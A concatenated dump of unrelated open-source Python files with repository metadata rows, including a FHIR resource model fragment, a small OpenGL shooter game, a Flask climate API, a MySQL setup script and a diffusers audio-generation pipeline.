type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_type", title="Extension field for ``type``."
)
url: fhirtypes.Uri = Field(
...,
alias="url",
title=(
"Canonical identifier for this structure definition, represented as a "
"URI (globally unique)"
),
description=(
"An absolute URI that is used to identify this structure definition "
"when it is referenced in a specification, model, design or an "
"instance; also called its canonical identifier. This SHOULD be "
"globally unique and SHOULD be a literal address at which at which an "
"authoritative instance of this structure definition is (or will be) "
"published. This URL can be the target of a canonical reference. It "
"SHALL remain the same when the structure definition is stored on "
"different servers."
),
# if property is element of this resource.
element_property=True,
)
url__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_url", title="Extension field for ``url``."
)
useContext: ListType[fhirtypes.UsageContextType] = Field(
None,
alias="useContext",
title="The context that the content is intended to support",
description=(
"The content was developed with a focus and intent of supporting the "
"contexts that are listed. These contexts may be general categories "
"(gender, age, ...) or may be references to specific programs "
"(insurance plans, studies, ...) and may be used to assist with "
"indexing and searching for appropriate structure definition instances."
),
# if property is element of this resource.
element_property=True,
)
version: fhirtypes.String = Field(
None,
alias="version",
title="Business version of the structure definition",
description=(
"The identifier that is used to identify this version of the structure "
"definition when it is referenced in a specification, model, design or "
"instance. This is an arbitrary value managed by the structure "
"definition author and is not expected to be globally unique. For "
"example, it might be a timestamp (e.g. yyyymmdd) if a managed version "
"is not available. There is also no expectation that versions can be "
"placed in a lexicographical sequence."
),
# if property is element of this resource.
element_property=True,
)
version__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_version", title="Extension field for ``version``."
)
class StructureDefinitionContext(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
If an extension, where it can be used in instances.
Identifies the types of resource or data type elements to which the
extension can be applied.
"""
resource_type = Field("StructureDefinitionContext", const=True)
expression: fhirtypes.String = Field(
...,
alias="expression",
title="Where the extension can be used in instances",
description=(
"An expression that defines where an extension can be used in " "resources."
),
# if property is element of this resource.
element_property=True,
)
expression__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_expression", title="Extension field for ``expression``."
)
type: fhirtypes.Code = Field(
...,
alias="type",
title="fhirpath | element | extension",
description=(
"Defines how to interpret the expression that defines what the context "
"of the extension is."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["fhirpath", "element", "extension"],
)
type__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_type", title="Extension field for ``type``."
)
class StructureDefinitionDifferential(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Differential view of the structure.
A differential view is expressed relative to the base StructureDefinition -
a statement of differences that it applies.
"""
resource_type = Field("StructureDefinitionDifferential", const=True)
element: ListType[fhirtypes.ElementDefinitionType] = Field(
...,
alias="element",
title="Definition of elements in the resource (if no StructureDefinition)",
description="Captures constraints on each element within the resource.",
# if property is element of this resource.
element_property=True,
)
class StructureDefinitionMapping(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
External specification that the content is mapped to.
An external specification that the content is mapped to.
"""
resource_type = Field("StructureDefinitionMapping", const=True)
comment: fhirtypes.String = Field(
None,
alias="comment",
title="Versions, Issues, Scope limitations etc.",
description=(
"Comments about this mapping, including version notes, issues, scope "
"limitations, and other important notes for usage."
),
# if property is element of this resource.
element_property=True,
)
comment__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_comment", title="Extension field for ``comment``."
)
identity: fhirtypes.Id = Field(
...,
alias="identity",
title="Internal id when this mapping is used",
description=(
"An Internal id that is used to identify this mapping set when specific"
" mappings are made."
),
# if property is element of this resource.
element_property=True,
)
identity__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_identity", title="Extension field for ``identity``."
)
name: fhirtypes.String = Field(
None,
alias="name",
title="Names what this mapping refers to",
description="A name for the specification that is being mapped to.",
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
uri: fhirtypes.Uri = Field(
None,
alias="uri",
title="Identifies what this mapping refers to",
description=(
"An absolute URI that identifies the specification that this mapping is"
" expressed to."
),
# if property is element of this resource.
element_property=True,
)
uri__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_uri", title="Extension field for ``uri``."
)
class StructureDefinitionSnapshot(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Snapshot view of the structure.
A snapshot view is expressed in a standalone form that can be used and
interpreted without considering the base StructureDefinition.
"""
resource_type = Field("StructureDefinitionSnapshot", const=True)
element: ListType[fhirtypes.ElementDefinitionType] = Field(
...,
alias="element",
title="Definition of elements in the resource (if no StructureDefinition)",
description="Captures constraints on each element within the resource.",
# if property is element of this resource.
element_property=True,
)
| [
"[email protected]"
] | |
6b71d3d92d65401d6fb5407d1cf62f26725c9907 | d9e093c9dde225f7aa93a55dd9f8cef7a31554b8 | /src/Model.py | f2309dd1227532fde1d65124e17a0f4ca18d5f00 | [] | no_license | bhaskarnn9/Decision_Tree | 82ea3f2c75da35b223dd3ad03c1ee569e13261ea | 6c2f6cef6b4572a8fe9bc49651a8d6d46b589604 | refs/heads/master | 2021-01-09T17:51:52.382457 | 2020-02-28T17:25:08 | 2020-02-28T17:25:08 | 242,396,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | from sklearn.tree import DecisionTreeClassifier
def model(x_train, y_train):
model_dt = DecisionTreeClassifier()
model_dt.fit(x_train, y_train)
return model_dt
| [
"[email protected]"
] | |
18af521eec108724726ec5adcdda8d372e30cc21 | b452bec081866efe25bab30b98d84181e766735f | /Aula 11.py | fbb66cb3819324b8e176ea596a0d5312b0c0b27f | [
"MIT"
] | permissive | camiloprado/Curso-Python | d40fe11019e410914d4dfaf6f14abcb63e4fdbb6 | de7ab850c3010397ef8d82531757e4e4339d1bb6 | refs/heads/main | 2023-03-07T08:29:18.234983 | 2021-02-28T22:50:13 | 2021-02-28T22:50:13 | 343,232,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | T = float(input('Digite a temperatura em °C:'))
F = T * 1.8 + 32
K = T + 273.15
print('A temperatura em:\nFahrenheit: {}°F\nKelvin: {}K'.format(F, K)) | [
"[email protected]"
] | |
5a70b3dd55fd3d9c45bbbf134b407923549c6c38 | 50edd95cf9ea295b4216e10361a3dfc7e029a660 | /anipose/train_autoencoder.py | e5534bcc6a314c1726f5d863fc601e59da0b5da8 | [
"BSD-2-Clause"
] | permissive | goyallon/anipose | 5fc03b66b5a362d8ea151c6df4cc6049bccabb15 | 2239cd04f1e6d1f21ff62aab005ebfe6fed351c8 | refs/heads/master | 2022-11-05T06:59:14.077907 | 2020-06-15T23:39:10 | 2020-06-15T23:39:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,255 | py | #!/usr/bin/env python3
from sklearn.neural_network import MLPRegressor, MLPClassifier
import pandas as pd
import os.path
import numpy as np
from glob import glob
from ruamel.yaml import YAML
import pickle
def get_dataset_location(model_folder):
config_fname = os.path.join(model_folder, 'config.yaml')
yaml = YAML(typ='rt')
with open(config_fname, 'r') as f:
dlc_config = yaml.load(f)
iternum = dlc_config['iteration']
fname_pat = os.path.join(
model_folder, 'training-datasets', 'iteration-'+str(iternum),
'*', 'CollectedData_*.h5')
fname = glob(fname_pat)[0]
return fname
def load_pose_2d_training(fname):
data_orig = pd.read_hdf(fname)
scorer = data_orig.columns.levels[0][0]
data = data_orig.loc[:, scorer]
bp_index = data.columns.names.index('bodyparts')
coord_index = data.columns.names.index('coords')
bodyparts = list(data.columns.get_level_values(bp_index).unique())
n_frames = len(data)
n_joints = len(bodyparts)
test = np.array(data).reshape(n_frames, n_joints, 2)
bad = np.any(~np.isfinite(test), axis=2)
test[bad] = np.nan
metadata = {
'bodyparts': bodyparts,
'scorer': scorer,
'index': data.index
}
return test, metadata
def generate_training_data(scores, n_iters=10):
Xs = []
ys = []
for i in range(n_iters):
scores_perturb = scores.copy()
good = scores_perturb == 1
scores_perturb[good] = np.random.normal(1, 0.3, size=np.sum(good))
scores_perturb[~good] = np.random.normal(0, 0.3, size=np.sum(~good))
flipped = np.random.uniform(size=good.shape) < 0.05
scores_perturb = np.clip(scores_perturb, 0, 1)
scores_perturb[flipped] = 1 - scores_perturb[flipped]
Xs.append(scores_perturb)
ys.append(scores)
X = np.vstack(Xs)
y = np.vstack(ys)
return X, y
def train_mlp_classifier(X, y):
hidden = X.shape[1]
mlp = MLPClassifier(hidden_layer_sizes=(hidden),
verbose=2, max_iter=2000,
activation='tanh',
learning_rate='adaptive', solver='adam',
early_stopping=True)
mlp.fit(X, y)
return mlp
def save_mlp_classifier(mlp, fname):
with open(fname, 'wb') as f:
pickle.dump(mlp, f)
print('autoencoder saved at:\n {}'.format(fname))
def train_autoencoder(config):
model_folder = config['model_folder']
data_fname = get_dataset_location(model_folder)
data, metadata = load_pose_2d_training(data_fname)
n_frames, n_joints, _ = data.shape
scores = np.ones((n_frames, n_joints), dtype='float64')
bad = np.any(~np.isfinite(data), axis=2)
scores[bad] = 0
X, y = generate_training_data(scores)
mlp = train_mlp_classifier(X, y)
out_fname = os.path.join(config['path'], 'autoencoder.pickle')
save_mlp_classifier(mlp, out_fname)
# model_folder = '/jellyfish/research/tuthill/hand-demo-dlc-TuthillLab-2019-08-05'
# config = {'model_folder': model_folder, 'path': model_folder}
# train_autoencoder(config)
# get dataset from deeplabcut folder
# generate augmented dataset to train autoencoder
# train MLP classifier
# save result
| [
"[email protected]"
] | |
220f90b48520a6be2e038fa30ada57931ce95040 | d88aa7b0bd55f73d9ac705f18e24cfb8fcd13a63 | /tests/test_user/test_user_model.py | 64ec45d5d04938fa3cdcae92750ee3002fd10daa | [] | no_license | guidiego/pylerplate | 0f8f826a2e0349d97968874a2b2c3827aa9e2d9a | 03adeeeb8b443b214e5237f40048895b491c6487 | refs/heads/master | 2020-05-02T22:54:37.276176 | 2019-07-09T20:04:37 | 2019-07-09T20:04:37 | 178,266,287 | 0 | 0 | null | 2019-04-04T14:08:36 | 2019-03-28T19:05:29 | null | UTF-8 | Python | false | false | 858 | py | import pytest
from app import bcrypt
from modules.user.models import User
from utils.errors import AuthenticationError
user_info = {
'email': '[email protected]',
'name': 'Test2',
'password': '123456'
}
def test_create_user():
new_user = User(**user_info)
new_user.save()
assert new_user.email == user_info['email']
assert new_user.name == user_info['name']
assert bcrypt.check_password_hash(
new_user.password,
user_info['password']
) is True
def test_user_credentials():
user = User.verify_credentials(user_info['email'], user_info['password'])
assert user.email == user_info['email']
def test_user_failed_credentials():
with pytest.raises(AuthenticationError):
User.verify_credentials(
'[email protected]',
user_info['password']
)
| [
"[email protected]"
] | |
4b6919850f299c61adeca136eb8288fc0dc88ade | c1cf94d9286a88457130448e1e8724b015cf7df3 | /jogo.py | 0372e8045a436d71466ed13b5b35430bf7982c7d | [] | no_license | arthur-sabioni/JogoPythonOpenGL | 55883356f32b16426c523118746a4db28a59b4d0 | 7b9902e968659fa13bc573500df260befdc5e32c | refs/heads/master | 2022-11-17T02:42:43.849786 | 2020-07-08T20:25:43 | 2020-07-08T20:25:43 | 278,186,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,560 | py | from OpenGL.GL import *
from OpenGL.GLUT import *
from OpenGL.GLU import *
import pygame
from JogadorClass import Jogador
from AtiradorClass import Atirador
from RazanteClass import Razante
from TelaClass import Tela
from random import randint
def loadImage(image):
textureSurface = pygame.image.load(image)
textureData = pygame.image.tostring(textureSurface, "RGB", 1)
width = textureSurface.get_width()
height = textureSurface.get_height()
texture = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D, texture)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, width, height, 0, GL_RGB,GL_UNSIGNED_BYTE, textureData)
return texture
#texturas
t0 = loadImage("./Texturas/coracao.png")
w,h=1000,1000
#Número de inimigos para atirar, iniciando do indice 0
numAtiradores = 14
#porcentagem de chance de algum inimigo ou razante ativar por ciclo
agressividade = 5
#jogador variavel global
j = Jogador()
#Tela que controla em qual estagio o jogo está, além do background e sprites na tela
t = Tela(j,t0)
#inimigos atiradores
a00 = Atirador(875,925)
a01 = Atirador(775,925)
a02 = Atirador(675,925)
a03 = Atirador(575,925)
a04 = Atirador(475,925)
a10 = Atirador(875,825)
a11 = Atirador(775,825)
a12 = Atirador(675,825)
a13 = Atirador(575,825)
a14 = Atirador(475,825)
a20 = Atirador(875,725)
a21 = Atirador(775,725)
a22 = Atirador(675,725)
a23 = Atirador(575,725)
a24 = Atirador(475,725)
alist = [a00,a01,a02,a03,a04,a10,a11,a12,a13,a14,a20,a21,a22,a23,a24]
#inimigos razantes
r00 = Razante(975,925)
r01 = Razante(375,925)
r10 = Razante(975,825)
r11 = Razante(375,825)
r20 = Razante(975,725)
r21 = Razante(375,725)
rlist = [r00,r01,r10,r11,r20,r21]
#lista de todos os inimigos juntos
elist = alist + rlist
etiros = []
def quadrado(posx,posy,h,l):
glColor3f(0.0, 1.0, 0.0)
glPushMatrix()
glBegin(GL_TRIANGLE_FAN)
glVertex2f(posx-l/2, posy-h/2)
glVertex2f(posx+l/2, posy-h/2)
glVertex2f(posx+l/2, posy+h/2)
glVertex2f(posx-l/2, posy+h/2)
glEnd()
glPopMatrix()
def quadradoTextura(posx,posy,h,l,textura):
glColor3f(1.0, 1.0, 1.0)
glEnable(GL_TEXTURE_2D)
glBindTexture(GL_TEXTURE_2D,textura)
glPushMatrix()
glBegin(GL_TRIANGLE_FAN)
glTexCoord2f(0,0)
glVertex2f(posx-l/2, posy-h/2)
glTexCoord2f(1,0)
glVertex2f(posx+l/2, posy-h/2)
glTexCoord2f(1,1)
glVertex2f(posx+l/2, posy+h/2)
glTexCoord2f(0,1)
glVertex2f(posx-l/2, posy+h/2)
glEnd()
glPopMatrix()
glDisable(GL_TEXTURE_2D)
def tiroJogador():
j.moverTiro()
def moverInimigos():
#mover para a direita se encostar na esquerda
if r01.getX() < 25:
for x in elist:
x.setDir(1)
x.setY(x.getY()-100) #descer 100px
#mover para a esquerda se encostar na direita
elif r00.getX() > 975:
for x in elist:
x.setDir(-1)
x.setY(x.getY()-100) #descer 100px
for x in elist:
x.movimentar()
#movimentos oscilantes para cima e para baixo(não implementados ainda)
def moverJogador():
#movimentos do teclado
if j.getA():
j.moverT(-1)
elif j.getD():
j.moverT(1)
def checarColisaoPlayer():
#checa se o tiro foi atirado, se sim checa sua colisão com cada inimigo
for x in j.getTiros():
if x.atirado == True:
for y in elist:
if checarColisaoRetangulos(y.getX(),y.getY(),y.getL(),y.getH(),x.getX(),x.getY(),10,50) and y.getVivo():
y.setVivo(False)
x.setAtirado(False)
def checarColisaoTiros():
for x in etiros:
if x.atirado == True:
if checarColisaoRetangulos(x.getX(),x.getY(),10,50,j.getX(),j.getY(),j.getL(),j.getH()):
j.setVidas(j.getVidas()-1)
x.setAtirado(False)
t.atualizarSprites()
def checarColisaoRetangulos(ax,ay,al,ah,bx,by,bl,bh):
colisaoX = False
if ax + al/2 >= bx - bl/2 and bx + bl/2 >= ax - al/2:
colisaoX = True
colisaoY = False
if ay + ah/2 >= by - bh/2 and by + bh/2 >= ay - ah/2:
colisaoY = True
return colisaoX and colisaoY
def tiroInimigos():
global etiros,alist
#chance para um inimigo atirar a cada atualização
temp1 = randint(0,100)
#porcentagem de chance
if temp1 < agressividade:
temp2 = randint(0,numAtiradores) #randomizar o inimigo que ira atirar
temp3 = 0 #contar até chegar o inimigo que ira atirar
for x in alist:
if temp3 != temp2:
temp3 += 1
elif x.getTiro().getAtirado() == False and x.getVivo() == True:
x.atirar()
# Alguns tiros sao colocados duas vezes na lista, eles se movimentam duas vezes por causa disso,
# mas vou chamar isso de feature ao invés de bug porque gostei da diversidade, mesmo podendo arrumar
# retirando os duplicados antes do passo de move-los
etiros.append(x.getTiro())
break
#mover os tiros
for x in etiros:
#se o tiro tiver acertado ou passado do limite, retirar da lista
if x.getAtirado() == False:
etiros.remove(x)
else:
x.mover()
def redimensiona(width,height):
#manter aspect ratio
global w,h
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, w, 0, h, -1, 1)
razaoAspectoJanela = (width)/height
razaoAspectoMundo = (w)/h
if razaoAspectoJanela < razaoAspectoMundo:
hViewport = width / razaoAspectoMundo
yViewport = (height - hViewport)/2
glViewport(0, yViewport, width, hViewport)
elif razaoAspectoJanela > razaoAspectoMundo:
wViewport = (height) * razaoAspectoMundo
xViewport = (width - wViewport)/2
glViewport(xViewport, 0, wViewport, height)
else:
glViewport(0, 0, width, height)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def iterate():
global w,h
glViewport(0, 0, w, h)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0.0, w, 0.0, h, 0.0, 1.0)
glMatrixMode (GL_MODELVIEW)
glLoadIdentity()
def desenhaCena():
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glLoadIdentity()
iterate()
#desenha jogador
quadrado(j.getX(),j.getY(),j.getL(),j.getH())
#desenha inimigos
for x in elist:
if x.getVivo() == True:
quadrado(x.getX(),x.getY(),x.getL(),x.getH())
#desenha tiro jogador
for x in j.getTiros():
if x.getAtirado():
quadrado(x.getX(),x.getY(),50,10)
#desenha tiros inimigos
for x in etiros:
quadrado(x.getX(),x.getY(),50,10)
#desenha tela
for x in t.getSprites():
quadradoTextura(x.getX(),x.getY(),x.getL(),x.getH(),0)
glutSwapBuffers()
def atualizaCena(periodo):
if t.getEstagio() == "jogo":
#atualizar tiro jogador
tiroJogador()
#movimentos
moverInimigos()
moverJogador()
#ações dos inimigos
tiroInimigos()
#checar a colisão dos tiros do player
checarColisaoPlayer()
#checar a colisão dos tiros inimigos
checarColisaoTiros()
if j.getVidas() == 0:
t.setEstagio("game over")
glutPostRedisplay()
glutTimerFunc(periodo,atualizaCena,periodo)
def inicializar():
glEnable(GL_BLEND )
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
def teclado(key,x,y):
if key == b'd':
j.setD(True)
elif key == b'a':
j.setA(True)
elif key == b' ':
j.atirar()
def tecladoUp(key,x,y):
if key == b'd':
j.setD(False)
elif key == b'a':
j.setA(False)
def movimentoMouse(x,y):
if t.getEstagio() == "jogo":
j.moverM(x,y)
def clickMouse(key,state,x,y):
if key == GLUT_LEFT_BUTTON and state == GLUT_DOWN and t.getEstagio() == "jogo":
j.atirar()
if __name__ == "__main__":
glutInit()
glutInitDisplayMode(GLUT_DOUBLE | GLUT_RGBA)
glutInitWindowSize(1000, 1000)
glutInitWindowPosition(0, 0)
wind = glutCreateWindow("jojo do zilla")
inicializar()
glutDisplayFunc(desenhaCena)
#glutReshapeFunc(redimensiona) #não funcionando
glutKeyboardFunc(teclado)
glutKeyboardUpFunc(tecladoUp)
glutPassiveMotionFunc(movimentoMouse)
glutMouseFunc(clickMouse)
glutTimerFunc(0,atualizaCena,33)
glutMainLoop() | [
"[email protected]"
] | |
964cfab6381ea5b1a9577e79c16426b7beb2cab5 | 01eca44be6eb85a0e67a2d0c6e8abf4ac26d7fcc | /venv/Scripts/pip3-script.py | 65dd573485a27e533b1ac3f07422090272f7da8b | [] | no_license | davrivas/python-learning | f44335333f50a4699d0e3d688e2c6aa3513c7162 | 2f1eec1d52099d68ca727af96ebfde828406eafb | refs/heads/master | 2020-07-15T15:22:45.494393 | 2019-08-31T21:03:49 | 2019-08-31T21:03:49 | 205,591,039 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | #!C:\Users\davr\PycharmProjects\python-learning\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
| [
"[email protected]"
] | |
bfd0efb0e36b0b024bbc189449f2c3d4196954f4 | 6532c9e25a1e664826c9f527b2a948522a7b675b | /data analyze/database/kuyun_word_create_table.py | 32a0274f123c5977d9ba127d8d7f0f4d20f95a9e | [] | no_license | maxin5452/coolyun | f1fa485d387619e4eac6c0722538c0bc60776882 | dc458187a110b0ad12618c6f15d5e0c225bf0af2 | refs/heads/master | 2021-01-20T07:00:08.433740 | 2017-08-27T14:30:36 | 2017-08-27T14:30:36 | 101,525,090 | 0 | 0 | null | 2017-08-27T02:39:47 | 2017-08-27T02:28:13 | null | UTF-8 | Python | false | false | 752 | py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import MySQLdb
# 打开数据库连接
db= MySQLdb.connect(
host='127.0.0.1',
port = 3306,
user='root',
passwd='000000',
db ='testdb',
)
# 使用cursor()方法获取操作游标
cursor = db.cursor()
# 如果数据表已经存在使用 execute() 方法删除表。
cursor.execute("DROP TABLE IF EXISTS WORD")
# 创建数据表SQL语句
sql = """CREATE TABLE WORD (
name CHAR(20) NOT NULL,
file_stamp VARCHAR(100),
file_time DATETIME,
userUrl VARCHAR(250),
region VARCHAR(30),
rank INT UNSIGNED,
count FLOAT )"""
cursor.execute(sql)
# 关闭数据库连接
db.close()
| [
"[email protected]"
] | |
aa4343291122dd23416402289795bff275cac613 | f301c6e7c7b97fac42c03db9a25575f9f396912d | /app.py | 501baea045324cabfc3dc110ef056b80a2cdc77b | [] | no_license | asukmawan/surfs_up | d4c2934d1f0825ad7f3cc4bba83c8f45b4db5956 | 59574419caa8d2b749b09575098b8efd1e176d21 | refs/heads/main | 2023-02-13T02:27:24.886423 | 2020-12-20T14:35:40 | 2020-12-20T14:35:40 | 321,559,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,900 | py | # Setup the weather app
#1. import dependencies
import datetime as dt
import numpy as np
import pandas as pd
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
# Setup the Database
engine = create_engine("sqlite:///hawaii.sqlite")
# Use automap_base() to put the database into classes and .prepare() to reflect the tables into SQLAlchemy
Base = automap_base()
Base.prepare(engine, reflect=True)
# Save our references to each table - Create a variable for each of the classes so we can reference them later
Measurement = Base.classes.measurement
Station = Base.classes .station
# Create a session link from Python to the Database
session = Session(engine)
# Create a flask application, being sure to pass __name__ in the app variable - we are putting the flask object into the app variable
app = Flask(__name__)
# Define our route - what to do when a user hits the index route - in this case this is the homepage - this is a static route
@app.route('/')
def welcome():
return (
'''
Welcome to the Climate Analysis API!
Available Routes:
/api/v1.0/precipitation
/api/v1.0/stations
/api/v1.0/tobs
/api/v1.0/temp/start/end
''')
# Create the precipitation route
@app.route('/api/v1.0/precipitation')
def precipitation():
prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)
precipitation = session.query(Measurement.date, Measurement.prcp).\
filter(Measurement.date >= prev_year).all()
precip = {date: prcp for date, prcp in precipitation}
return jsonify(precip)
# Completed stations route
@app.route('/api/v1.0/stations')
def stations():
results = session.query(Station.station).all()
stations = list(np.ravel(results))
return jsonify(stations=stations)
# Completed Monthly Temperature Route
@app.route("/api/v1.0/tobs")
def temp_monthly():
prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)
results = session.query(Measurement.tobs).\
filter(Measurement.station == 'USC00519281').\
filter(Measurement.date >= prev_year).all()
temps = list(np.ravel(results))
return jsonify(temps=temps)
# Completed Stats for Date Range Route
@app.route("/api/v1.0/temp/<start>")
@app.route("/api/v1.0/temp/<start>/<end>")
def stats(start=None, end=None):
sel = [func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]
if not end:
results = session.query(*sel).\
filter(Measurement.date >= start).\
filter(Measurement.date <= end).all()
temps = list(np.ravel(results))
return jsonify(temps)
results = session.query(*sel).\
filter(Measurement.date >= start).\
filter(Measurement.date <= end).all()
temps = list(np.ravel(results))
return jsonify(temps=temps) | [
"[email protected]"
] | |
4b95149358f6dfefe0687c5d6e8ae4f54758fb4a | b74320ad439e37dfa48cd8db38dab3b7a20a36ff | /src/diffusers/pipelines/dance_diffusion/pipeline_dance_diffusion.py | b2d46c6f90f142635dec50da02b00fe63b3e40c2 | [
"Apache-2.0"
] | permissive | huggingface/diffusers | c82beba1ec5f0aba01b6744040a5accc41ec2493 | 5eeedd9e3336882d598091e191559f67433b6427 | refs/heads/main | 2023-08-29T01:22:52.237910 | 2023-08-28T18:16:27 | 2023-08-28T18:16:27 | 498,011,141 | 17,308 | 3,158 | Apache-2.0 | 2023-09-14T20:57:44 | 2022-05-30T16:04:02 | Python | UTF-8 | Python | false | false | 6,254 | py | # Copyright 2023 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, Optional, Tuple, Union
import torch
from ...utils import logging, randn_tensor
from ..pipeline_utils import AudioPipelineOutput, DiffusionPipeline
logger = logging.get_logger(__name__) # pylint: disable=invalid-name
class DanceDiffusionPipeline(DiffusionPipeline):
r"""
Pipeline for audio generation.
This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods
implemented for all pipelines (downloading, saving, running on a particular device, etc.).
Parameters:
unet ([`UNet1DModel`]):
A `UNet1DModel` to denoise the encoded audio.
scheduler ([`SchedulerMixin`]):
A scheduler to be used in combination with `unet` to denoise the encoded audio latents. Can be one of
[`IPNDMScheduler`].
"""
def __init__(self, unet, scheduler):
super().__init__()
self.register_modules(unet=unet, scheduler=scheduler)
@torch.no_grad()
def __call__(
self,
batch_size: int = 1,
num_inference_steps: int = 100,
generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None,
audio_length_in_s: Optional[float] = None,
return_dict: bool = True,
) -> Union[AudioPipelineOutput, Tuple]:
r"""
The call function to the pipeline for generation.
Args:
batch_size (`int`, *optional*, defaults to 1):
The number of audio samples to generate.
num_inference_steps (`int`, *optional*, defaults to 50):
The number of denoising steps. More denoising steps usually lead to a higher-quality audio sample at
the expense of slower inference.
generator (`torch.Generator`, *optional*):
A [`torch.Generator`](https://pytorch.org/docs/stable/generated/torch.Generator.html) to make
generation deterministic.
audio_length_in_s (`float`, *optional*, defaults to `self.unet.config.sample_size/self.unet.config.sample_rate`):
The length of the generated audio sample in seconds.
return_dict (`bool`, *optional*, defaults to `True`):
Whether or not to return a [`~pipelines.AudioPipelineOutput`] instead of a plain tuple.
Example:
```py
from diffusers import DiffusionPipeline
from scipy.io.wavfile import write
model_id = "harmonai/maestro-150k"
pipe = DiffusionPipeline.from_pretrained(model_id)
pipe = pipe.to("cuda")
audios = pipe(audio_length_in_s=4.0).audios
# To save locally
for i, audio in enumerate(audios):
write(f"maestro_test_{i}.wav", pipe.unet.sample_rate, audio.transpose())
# To dislay in google colab
import IPython.display as ipd
for audio in audios:
display(ipd.Audio(audio, rate=pipe.unet.sample_rate))
```
Returns:
[`~pipelines.AudioPipelineOutput`] or `tuple`:
If `return_dict` is `True`, [`~pipelines.AudioPipelineOutput`] is returned, otherwise a `tuple` is
returned where the first element is a list with the generated audio.
"""
if audio_length_in_s is None:
audio_length_in_s = self.unet.config.sample_size / self.unet.config.sample_rate
sample_size = audio_length_in_s * self.unet.config.sample_rate
down_scale_factor = 2 ** len(self.unet.up_blocks)
if sample_size < 3 * down_scale_factor:
raise ValueError(
f"{audio_length_in_s} is too small. Make sure it's bigger or equal to"
f" {3 * down_scale_factor / self.unet.config.sample_rate}."
)
original_sample_size = int(sample_size)
if sample_size % down_scale_factor != 0:
sample_size = (
(audio_length_in_s * self.unet.config.sample_rate) // down_scale_factor + 1
) * down_scale_factor
logger.info(
f"{audio_length_in_s} is increased to {sample_size / self.unet.config.sample_rate} so that it can be handled"
f" by the model. It will be cut to {original_sample_size / self.unet.config.sample_rate} after the denoising"
" process."
)
sample_size = int(sample_size)
dtype = next(self.unet.parameters()).dtype
shape = (batch_size, self.unet.config.in_channels, sample_size)
if isinstance(generator, list) and len(generator) != batch_size:
raise ValueError(
f"You have passed a list of generators of length {len(generator)}, but requested an effective batch"
f" size of {batch_size}. Make sure the batch size matches the length of the generators."
)
audio = randn_tensor(shape, generator=generator, device=self._execution_device, dtype=dtype)
# set step values
self.scheduler.set_timesteps(num_inference_steps, device=audio.device)
self.scheduler.timesteps = self.scheduler.timesteps.to(dtype)
for t in self.progress_bar(self.scheduler.timesteps):
# 1. predict noise model_output
model_output = self.unet(audio, t).sample
# 2. compute previous audio sample: x_t -> t_t-1
audio = self.scheduler.step(model_output, t, audio).prev_sample
audio = audio.clamp(-1, 1).float().cpu().numpy()
audio = audio[:, :, :original_sample_size]
if not return_dict:
return (audio,)
